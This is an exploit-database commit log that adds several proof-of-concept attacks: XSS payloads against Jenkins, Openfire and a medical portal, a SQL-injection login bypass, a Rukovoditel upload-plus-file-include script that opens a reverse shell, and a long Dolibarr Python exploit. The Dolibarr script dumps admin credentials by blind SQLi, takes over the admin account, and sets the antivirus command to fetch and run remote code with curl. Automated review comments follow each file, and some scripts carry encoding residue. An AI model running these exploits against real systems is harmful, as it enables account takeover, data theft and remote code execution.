DB: 2020-12-12

12 changes to exploits/shellcodes

Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)
Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass (MS15-014)
Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
Openfire 4.6.0 - 'groupchatJID' Stored XSS
Openfire 4.6.0 - 'users' Stored XSS
Openfire 4.6.0 - 'sql' Stored XSS
Medical Center Portal Management System 1.0 - Multiple Stored XSS
Jenkins 2.235.3 - 'Description' Stored XSS
Rukovoditel 2.6.1 - RCE
Supply Chain Management System - Auth Bypass SQL Injection
Dolibarr 12.0.3 - SQLi to RCE
Courier Management System 1.0 - 'First Name' Stored XSS
Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection
Courier Management System 1.0 - 'ref_no' SQL Injection
Offensive Security 2020-12-12 05:01:57 +00:00
parent 42b9ff04f0
commit fc0129fabf
13 changed files with 823 additions and 2 deletions


@ -0,0 +1,62 @@
# Exploit Title: Jenkins 2.235.3 - 'tooltip' Stored Cross-Site Scripting
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2229
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons.
Tooltip values can be contributed by plugins, some of which use user-specified values.
This results in a stored cross-site scripting (XSS) vulnerability.
Jenkins 2.252, LTS 2.235.4 escapes the tooltip content of help icons.
Technical Details and Exploitation:
As it is possible to observe from patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/c991b45b5bae09f9894acdc1f1fb1d8809fe6ef6
The fix to solve the vulnerability is applied to 'core/src/main/resources/lib/layout/svgIcon.jelly' tooltip attribute:
<svg class="svg-icon ${attrs.class}"
viewBox="${attrs.viewBox != null ? attrs.viewBox : '0 0 24 24'}"
focusable="${attrs.focusable != null ? attrs.focusable : 'false'}"
aria-hidden="${attrs.ariaHidden != null ? attrs.ariaHidden : ''}"
style="${attrs.style}"
onclick="${attrs.onclick}"
tooltip="${h.xmlEscape(attrs.tooltip ?: '')}">
svgIcon is a layout element belonging to jenkins core: https://reports.jenkins.io/core-taglib/jelly-taglib-ref.html#layout:svgIcon
As suggested by Jenkins documentation (https://www.jenkins.io/doc/developer/security/xss-prevention/)
"Note that this only affects the use of ${...} among PCDATA, and not in attribute values, so that Jelly tag invocations dont result in surprising behavior."
Tooltip attribute can contain HTML code, as suggested in form section: https://www.jenkins.io/doc/developer/forms/adding-tool-tips/
For this reason, it is possible to inject XSS code in a Jenkins system by uploading a plugin that contains an <j:svgIcon> element containing a malicious XSS payload in tooltip attribute:
<l:svgIcon tooltip="<img src=a onerror=alert(1)>">...</l:svgIcon>
To build a Jenkins plugin, visit https://www.jenkins.io/doc/developer/tutorial/create/ .
To obtain information about Jelly syntax, visit https://wiki.jenkins.io/display/JENKINS/Basic+guide+to+Jelly+usage+in+Jenkins
Proof Of Concept:
1. Obtain access to upload Jenkins plugins, or find plugins that can insert svgIcon element.
2. Generate a plugin. For example, you can create a class that implements ModelObjectWithContextMenu interface to create a context menu and implement the method getUrlName()
containing a <plugin-url> string that you can navigate by using the link: http(s)://<jenkins_server>/<plugin-url>
3. In jelly file, insert the following element:
<l:svgIcon tooltip="<img src=a onerror=alert(1)>"><path d="M9 16.17L4.83 12l-1.42 1.41L9 19 21 7l-1.41-1.41z"></path></l:svgIcon>
This creates an icon that triggers the Cross-Site Scripting when the mouse is over and opens tooltip. Obviously, you can use css and large size and height to generate a svg element that covers all the screen in order to trigger the XSS when the user navigates the page.
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
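Review bot: the privilege precondition for this PoC is only implied by step 1 ("Obtain access to upload Jenkins plugins, or find plugins that can insert svgIcon element") and is never recorded in the header, unlike the companion 'Description' file in this commit, which carries the vendor's Overall/Manage statement; add a privileges-required line so the severity can be triaged. The quoted Jelly note ("this only affects the use of ${...} among PCDATA, and not in attribute values") is the root cause and deserves one explicit sentence: because attribute values are not auto-escaped, the fix has to escape the value itself, which is exactly what `tooltip="${h.xmlEscape(attrs.tooltip ?: '')}"` does. `# Date: 11/12/2020` is ambiguous between day-first and month-first and differs in form from the `2020-12-11` the CSV records for this entry; use ISO 8601. `# Tested on: any` is not a test platform; name the release actually tested.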


@ -0,0 +1,79 @@
# Exploit Title: Jenkins 2.235.3 - 'Description' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2230
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957
https://www.openwall.com/lists/oss-security/2020/08/12/4
Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description that is displayed on item creation.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission.
Jenkins 2.252, LTS 2.235.4 escapes the project naming strategy description.
Technical Details and Exploitation:
As it is possible to observe from patch commit:
https://github.com/jenkinsci/jenkins/pull/4918/commits/7529ce8905910849e890b7e26d6563e0d56189d2
The fix to solve the vulnerability is applied in activateValidationMessage function to 'war/src/main/js/add-item.js' javascript file:
function activateValidationMessage(messageId, context, message) {
...
$(messageId, context).html('&#187; ' + message); // AFTER FIX: $(messageId, context).text('» ' + message);
...
}
The function is called during the creation of a new Item, on "blur input" event (when text element of name input is focused):
$('input[name="name"]', '#createItem').on("blur input", function() {
if (!isItemNameEmpty()) {
var itemName = $('input[name="name"]', '#createItem').val();
$.get("checkJobName", { value: itemName }).done(function(data) {
var message = parseResponseFromCheckJobName(data);
if (message !== '') {
activateValidationMessage('#itemname-invalid', '.add-item-name', message); // INJECTION HERE
} else {
cleanValidationMessages('.add-item-name');
showInputHelp('.add-item-name');
setFieldValidationStatus('name', true);
if (getFormValidationStatus()) {
enableSubmit(true);
}
}
});
} else {
....
activateValidationMessage('#itemname-required', '.add-item-name');
}
});
as "message" param is the injection point, we need to trigger an "invalid item name": when you are creating a new item and the name is not compliant with validation rules, an error is triggered. Error message is not escaped for vulnerable versions, so it is vulnerable to XSS.
Validation rules can trigger an error in several ways, for example:
- if the current item name is equal to an already existent item name;
- if a project naming strategy is defined: in this case, if the project name is not compliant with a regex strategy, a error message is shown.
In the first case Jenkins seems to be protected because when a new project is created, it is not possible to insert malicious characters (such as <,>).
In the second case, the error message also shows a description, that can be provided by the user during the regex strategy creation. In description field, it is possible to inject malicious characters, so it is possible to insert an XSS payload in description field.
When the user insert a name that is not compliant with project naming strategy, the XSS is triggered.
Proof Of Concept:
1. In <jenkins_url>/configure create a new Project Naming Strategy (enable checkbox "Restrict project naming") containing the following values:
Pattern: ^TEST.*
Description: GX1h4ck <img src=a onerror=alert(1)>
2. Go to New element creation section (/<jenkins_url>/jenkins/view/all/newJob).
When you insert a character in the name field, alert is triggered.
Solution:
The following releases contain fixes for security vulnerabilities:
* Jenkins 2.252
* Jenkins LTS 2.235.4
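Review bot: the two PoC URLs are inconsistent: step 1 uses `<jenkins_url>/configure` while step 2 uses `/<jenkins_url>/jenkins/view/all/newJob`, with a leading slash before the placeholder and an extra `jenkins` path segment, so one of them is wrong. The vendor description states the precondition (users with Overall/Manage permission) but the exploit header omits it; record it there. The fix is carried entirely by the inline comment on `$(messageId, context).html('&#187; ' + message); // AFTER FIX: $(messageId, context).text('» ' + message);`; a sentence of prose saying that jQuery `.html()` parses its argument as markup while `.text()` inserts it literally would make the root cause clear to readers who skip the code. The claim for the first case ("it is not possible to insert malicious characters (such as <,>)") should cite where that item-name validation lives, otherwise it cannot be checked. Same ISO-date remark as the 'tooltip' file.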


@ -0,0 +1,30 @@
# Exploit Title: Openfire 4.6.0 - 'groupchatJID' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 144
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer:
http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E&groupchatName=&groups=&type=groupchat&users=
Vulnerable parametersgroupchatJID
payload"><ScRiPt>alert(document.cookie)</ScRiPt>
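Review bot: the captured request and the stated payload disagree: the POST body injects the scanner probe `%22%3E%3CsCrIpT%3Evkhewwrqrb%3C%2FsCrIpT%3E`, while the closing line gives `"><ScRiPt>alert(document.cookie)</ScRiPt>`; state which one was actually verified, and on which page the stored bookmark is rendered, since a stored XSS report without the sink location cannot be triaged. The last two lines have lost their separators (`Vulnerable parametersgroupchatJID`, `payload"><ScRiPt>...`); write `Vulnerable parameters: groupchatJID` and `Payload: ...`. The `User-Agent`, `Accept` and `Referer` headers are wrapped mid-value (`Gecko/20100101` / `Firefox/68.0`), which a reader pasting the request has to rejoin. The Cookie line carries live `JSESSIONID`, `csrf` and `DWRSESSIONID` values from the test instance; session identifiers should be redacted in published requests. No CVE, reference or fixed-version line is given.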


@ -0,0 +1,28 @@
# Exploit Title: Openfire 4.6.0 - 'users' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E
Vulnerable parametersusers
payload"><ScRiPt>alert(document.cookie)</ScRiPt>
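Review bot: this is the same `create-bookmark.jsp` request as the 'groupchatJID' file with the probe moved to the `users` parameter; the two would be clearer as one advisory listing both vulnerable parameters instead of two files with identical headers. As in that file, the captured probe (`kcxbfhabog`) is not the `alert(document.cookie)` payload stated at the end, the `Vulnerable parametersusers` / `payload...` lines lack separators, the live session cookies should be redacted, and there is no CVE, reference, fixed-version or sink-location information.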


@ -0,0 +1,30 @@
# Exploit Title: Openfire 4.6.0 - 'sql' Stored XSS
# Date: 20201211
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0
POST /plugins/dbaccess/db-access.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101
Firefox/68.0
Content-Length: 78
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=zsq8G2h1dxK9JST; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn;
jiveforums.admin.logviewer=debug.size=0&all.size=524269&warn.size=856459&error.size=0&info.size=145819
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/dbaccess/db-access.jsp
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip
execute=Execute+SQL&sql=%3C%2FTeXtArEa%3E%3CsCrIpT%3Etkfbrxuddq%3C%2FScRiPt%3E
Vulnerable parameterssql
payload"><ScRiPt>alert(document.cookie)</ScRiPt>
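Review bot: the injected value `%3C%2FTeXtArEa%3E%3CsCrIpT%3E...` (that is, `</textarea><script>`) implies the reflection point is the SQL textarea on db-access.jsp into which the submitted `sql` value is echoed, but the closing `payload"><ScRiPt>alert(document.cookie)</ScRiPt>` line is an attribute-context payload that would not leave a textarea; the two should agree, and the report should say where the value is written back. The title says Stored XSS, yet nothing in the request or text shows the value being persisted and rendered on a later page; if it is only echoed in the response to this POST, reclassify it as reflected. Same missing separators (`Vulnerable parameterssql`), missing CVE/reference/fixed-version lines, wrapped `User-Agent`/`Accept` headers and live session identifiers in the Cookie line as in the other two Openfire files; the `jiveforums.admin.logviewer` cookie is unrelated to the issue and can be dropped from the sample.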


@ -0,0 +1,26 @@
# Exploit Title: Medical Center Portal Management System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the application with any valid user credentials.
Step 2: Click on "Medical Products", select "Add Medical Products", use
"<scrip>alert(1)</script>" in both name ad description fields. Complete the
other fields and save product.
Step 3: Once you click on save, this should trigger the XSS payload.
clicking on the "Medical Products" page anytime will trigger the Stored XSS
Payload
Note: Same method applies to "Add New Hospital | Pharmacy page"
Step 1: Use "<scrip>alert("r0b0tG4nG")</script>" as hospital/pharmacy name,
fill the other required information and click on save. Your payload will be
executed anytime you click on "Medical Products" page or "Add New Hospital
| Pharmacy page" page.
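Review bot: the payload in Step 2 and in the second Step 1, `<scrip>alert(1)</script>` and `<scrip>alert("r0b0tG4nG")</script>`, has a misspelled opening tag; as written a browser sees an unknown `<scrip>` element, renders `alert(...)` as text and ignores the stray `</script>`, so the PoC would not fire. The intended tag is presumably the one the Courier Management System file in this commit uses. Step numbering restarts at 1 under the Note, and 'name ad description' should read 'name and description'. The header has no CVE, and `# Affected Version: Version 1` restates the title's 1.0 rather than naming a release. The report also never says which page or PHP file renders the product, hospital or pharmacy name unescaped, which the vendor would need to locate the fix.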

exploits/php/webapps/49238.sh Executable file

@ -0,0 +1,77 @@
# Exploit Title: Rukovoditel 2.6.1 - RCE
# Date: 2020-06-11
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c1010
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
set -e
function usage () {
echo "NAME: Rukovoditel v2.6.1, RCE"
echo "SYNOPSIS: ./rce_2.6.1.sh <BASE_URL> <SID>"
echo "DESCRIPTION:"
echo "Upload file test.php on the remote server and trigger the file using a LFI"
echo "AUTHOR: coiffeur"
exit
}
if [ "$#" -ne 2 ]; then
usage
fi
BASE_URL=$1
SID=$2
echo "Setting target: $BASE_URL"
echo "Setting sid: $SID"
echo ""
echo "Extracting \$app_user['id']:"
APP_USER_ID=`curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID" | grep "validate_form&id=" | cut -d '=' -f 3 | cut -d "'" -f 1`
echo " => \$app_user['id']: $APP_USER_ID"
echo "Setting arbitrary \$_POST['timestamp']:"
TIMESTAMP=1337
echo " => \$_POST['timestamp']: 1337"
echo "Calculating \$verifyToken:"
VERIFY_TOKEN=`echo -n "$APP_USER_ID$TIMESTAMP" | md5sum | cut -d ' ' -f 1=`
echo " => \$verifyToken: $VERIFY_TOKEN"
echo ""
echo "[*] Trying to upload test.php ... (Arbitrary File Upload)"
curl "$BASE_URL/index.php?module=users/account&action=attachments_upload" -H "Cookie: sid=$SID" -F "timestamp=$TIMESTAMP" -F "token=$VERIFY_TOKEN" -F 'Filedata=@test.php'
echo ""
echo "[*] Trying to recover time() output:"
TIME=$(date -d "`curl -si "$BASE_URL" | grep "Date:" | sed 's/Date: //'`"= +%s)
echo " => timestamp: $TIME"
echo "[*] Trying to recover the generated filename:"=20
FILENAME=` echo -n $TIME"_test.php" | sha1sum | cut -d ' ' -f 1`
echo " => filename: $FILENAME"
echo "[*] Trying to reconstructing full path:"
DATE=`date +"%Y/%m/%d"`
FULL_PATH=`echo -n "uploads/attachments/$DATE/$FILENAME"`
echo " => full path: $FULL_PATH"
echo ""
echo "[!] Prepare a netcat listener by typing: nc -lvp 4444"
echo ""
echo "[*] Trying to update language settings ... (Local File Inclusion)"
LANGUAGE="../../$FULL_PATH"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=$LANGUAGE"
echo "[*] Triggering reverse shell ..."
curl -s "$BASE_URL/index.php?module=users/account" -H "Cookie: sid=$SID="
echo "[*] Restoring default language settings"
curl -s "$BASE_URL/index.php?module=users/account&action=update" -H "Cookie: sid=$SID" -d "fields[13]=english.php"
echo "> Done"
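Review bot: the script contains quoted-printable residue from the submission that breaks it as committed: `cut -d ' ' -f 1=` in the VERIFY_TOKEN line, the stray `=` after the closing quote in `TIME=$(date -d "..."= +%s)`, the `=20` after `echo "[*] Trying to recover the generated filename:"`, and `sid=$SID="` in the trigger request; these need to be stripped before the file is usable as a reference. `echo " => \$_POST['timestamp']: 1337"` hardcodes the value instead of printing `$TIMESTAMP`. `test.php` is read from the current directory without a check, and under `set -e` a missing file makes curl exit non-zero and stops the script with no explanation; the usage text should at least say the file must exist. The header's `# Date: 2020-06-11` disagrees with the `2020-12-11` the CSV records for 49238, and there is no CVE or fixed-version line for either of the two issues the comments name (the arbitrary file upload and the `fields[13]` language include).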


@ -0,0 +1,21 @@
# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4
#Vulnerable Page: Login Page
#Exploit
Open the Application
check the URL: http://localhost/scm-master/
Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin
click on login
The SQL payload gets executed and authentication is bypassed successfully
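Review bot: the header has no `# Version:` line and the title carries no version either, so the CSV entry cannot be matched to a release; add the version tested. The steps show the bypass but name neither the vulnerable parameter nor the file (which login query concatenates the username), so the vendor has nothing to act on; name the parameter and file, and add a remediation line (parameterised queries). `#Vulnerable Page:` and `#Exploit` lack the space after `#` that the other header lines use, and the steps would read better numbered like the other PoCs in this commit.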

exploits/php/webapps/49240.py Executable file

@ -0,0 +1,368 @@
# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3
import argparse
import binascii
import random
import re
from io import BytesIO
from urllib.parse import quote_plus as qp
import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image
DELTA = None
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80
DELAY = 1
LIKE = "%_subscription"
COLUMNS = ["login", "pass_temp"]
def usage():
banner = """NAME: Dolibarr SQLi to RCE (authenticate)
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PAS=
SWORD>
EXAMPLE:
python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12=
.0.3/htdocs/" -u test -p test
AUTHOR: coiffeur
"""
print(banner)
exit(-1)
def hex(text):
return "0x" + binascii.hexlify(text.encode()).decode()
def hash(password):
salt = bcrypt.gensalt()
hashed = bcrypt.hashpw(password.encode(), salt)
return hashed.decode()
def authenticate(url, username, password):
datas = {
"actionlogin": "login",
"loginfunction": "loginfunction",
"username": username,
"password": password
}
r = SESSION.post(f"{url}index.php", data=datas,
allow_redirects=False, verify=False)
if r.status_code != 302:
if DEBUG:
print(f"[x] Authentication failed!")
return 0
if DEBUG:
print(f" [*] Authenticated as: {username}")
return 1
def get_antispam_code(base_url):
code = ""
while len(code) != 5:
r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
temp_image = f"/tmp/{random.randint(0000,9999)}"
with open(temp_image, "wb") as f:
f.write(r.content)
with open(temp_image, "rb") as f:
code = pytesseract.image_to_string(
Image.open(BytesIO(f.read()))).split("\n")[0]
for char in code:
if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":
code = ""
break
return code
def reset_password(url, login):
for _ in range(5):
code = get_antispam_code(url)
headers = {
"Referer": f"{url}user/passwordforgotten.php"
}
datas = {
"action": "buildnewpassword",
"username": login,
"code": code
}
r = SESSION.post(url=f"{url}user/passwordforgotten.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in [f"Request to change password for {login} sent =
to", f"Demande de changement de mot de passe pour {login} envoy=C3=A9e"]:
if r.text.find(response):
if DEBUG:
print(f" [*] Password reset using code: {code}")
return 1
return 0
def change_password(url, login, pass_temp):
r = requests.get(url=f"{url}user/passwordforgotten.php?action=val=
idatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",
allow_redirects=False, verify=False)
if r.status_code == 302:
if DEBUG:
print(f" [*] Password changed: {pass_temp}")
return 1
return 0
def change_binary(url, command, parameters):
headers = {
"Referer": f"{url}admin/security_file.php"
}
datas = {
"action": "updateform",
"MAIN_UPLOAD_DOC": "2048",
"MAIN_UMASK": "0664",
"MAIN_ANTIVIRUS_COMMAND": command,
"MAIN_ANTIVIRUS_PARAM": parameters
}
r = SESSION.post(url=f"{url}admin/security_file.php",
data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["Record modified successfully", "Enregistrement mo=
difi=C3=A9 avec succ=C3=A8s"]:
if response in r.text:
if DEBUG:
print(f" [*] Binary's path changed")
return 1
return 0
def trigger_exploit(url):
headers = {
"Referer": f"{url}admin/security_file.php"
}
files = {
"userfile[]": open("junk.txt", "rb"),
}
datas = {
"sendit": "Upload"
}
if DEBUG:
print(f" [*] Triggering reverse shell")
r = SESSION.post(url=f"{url}admin/security_file.php",
files=files, data=datas, headers=headers, verify=False)
if r.status_code == 200:
for response in ["File(s) uploaded successfully", "The antivirus pr=
ogram was not able to validate the file (file might be infected by a virus)=
", "Fichier(s) t=C3=A9l=C3=A9vers=C3=A9s(s) avec succ=C3=A8s", "L'antivirus=
n'a pas pu valider ce fichier (il est probablement infect=C3=A9 par un vir=
us) !"]:
if response in r.text:
if DEBUG:
print(f" [*] Exploit done")
return 1
return 0
def get_version(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(
r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)
if x:
version = x[0]
if "12.0.3" in version:
if DEBUG:
print(f" [*] {version} (exploit should work)")
return 1
if DEBUG:
print(f"[*] Version may not be vulnerable")
return 0
def get_privileges(url):
r = SESSION.get(f"{url}index.php", verify=False)
x = re.findall(r"id=\d", r.text)
if x:
id = x[0]
if DEBUG:
print(f" [*] id found: {id}")
r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
for img in soup.find_all("img"):
if img.get("title") in ["Actif", "Active"]:
for td in img.parent.parent.find_all("td"):
privileges = [
"Consulter les commandes clients", "Read customers =
orders"]
for privilege in privileges:
if privilege in td:
if DEBUG:
print(
f" [*] Check privileges: {privilege}=
")
return 1
if DEBUG:
print(f"[*] At the sight of the privileges, the exploit may fail")
return 0
def check(url, payload):
headers = {
"Referer": f"{url}commande/stats/index.php?leftmenu=orders"
}
datas = {"object_status": payload}
r = SESSION.post(url=f"{url}commande/stats/index.php",
data=datas, headers=headers, verify=False)
return r.elapsed.total_seconds()
def evaluate_delay(url):
global DELTA
deltas = []
payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
for _ in range(4):
deltas.append(check(url, payload))
DELTA = sum(deltas)/len(deltas)
if DEBUG:
print(f" [+] Delta: {DELTA}")
def get_tbl_name_len(url):
i = 0
while 1:
payload = f"IF((SELECT LENGTH(table_name) FROM information_schema=
.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_tbl_name(url, length):
tbl_name = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM i=
nformation_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP=
({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
tbl_name += chr(min)
return tbl_name
def get_elt_len(url, tbl_name, column_name):
i = 0
while 1:
payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMI=
T 1)>{i}, SLEEP(0), SLEEP({DELAY}))"
if check(url, payload) >= DELTA*TRESHOLD:
return i
if i > 100:
print(f"[x] Exploit failed")
exit(-1)
i += 1
def get_elt(url, tbl_name, column_name, length):
elt = ""
for i in range(1, length+1):
min, max = 0, 127-1
while min < max:
mid = (max + min) // 2
payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FRO=
M {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"
if check(url, payload) >= DELTA*TRESHOLD:
max = mid
else:
min = mid + 1
elt += chr(min)
return elt
def get_row(url, tbl_name):
print(f" [*] Dump admin's infos from {tbl_name}")
infos = {}
for column_name in COLUMNS:
elt_length = get_elt_len(url, tbl_name, column_name)
infos[column_name] = get_elt(url, tbl_name, column_name, elt_leng=
th)
if DEBUG:
print(f" [+] Infos: {infos}")
return infos
def main(url, username, password):
# Check if exploit is possible
print(f"[*] Requirements:")
if not authenticate(url, username, password):
print(f"[x] Exploit failed!")
exit(-1)
get_version(url)
get_privileges(url)
print(f"\n[*] Starting exploit:")
# Evaluate delay
evaluate_delay(url)
print(f" [*] Extract prefix (using table: {LIKE})")
tbl_name_len = get_tbl_name_len(url)
tbl_name = get_tbl_name(url, tbl_name_len)
prefix = f"{tbl_name.split('_')[0]}_"
if DEBUG:
print(f" [+] Prefix: {prefix}")
# Dump admin's infos
user_table_name = f"{prefix}user"
infos = get_row(url, user_table_name)
if not infos["login"]:
print(f"[x] Exploit failed!")
exit(-1)
# Reset admin's passworrd
if DEBUG:
print(f" [*] Reseting {infos['login']}'s password")
if not reset_password(url, infos["login"]):
print(f"[x] Exploit failed!")
exit(-1)
infos = get_row(url, user_table_name)
# Remove cookies to logout
# Change admin's password
# Login as admin
SESSION.cookies.clear()
if not change_password(url, infos['login'], infos['pass_temp']):
print(f"[x] Exploit failed!")
exit(-1)
authenticate(url, infos['login'], infos['pass_temp'])
# Change antivirus's binary path
# Trigger reverse shell
change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"'=
)
trigger_exploit(url)
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", help="Base URL of Dolibarr")
parser.add_argument("-u", help="Username")
parser.add_argument("-p", help="Password")
args = parser.parse_args()
if not args.t or not args.u or not args.p:
usage()
main(args.t, args.u, args.p)
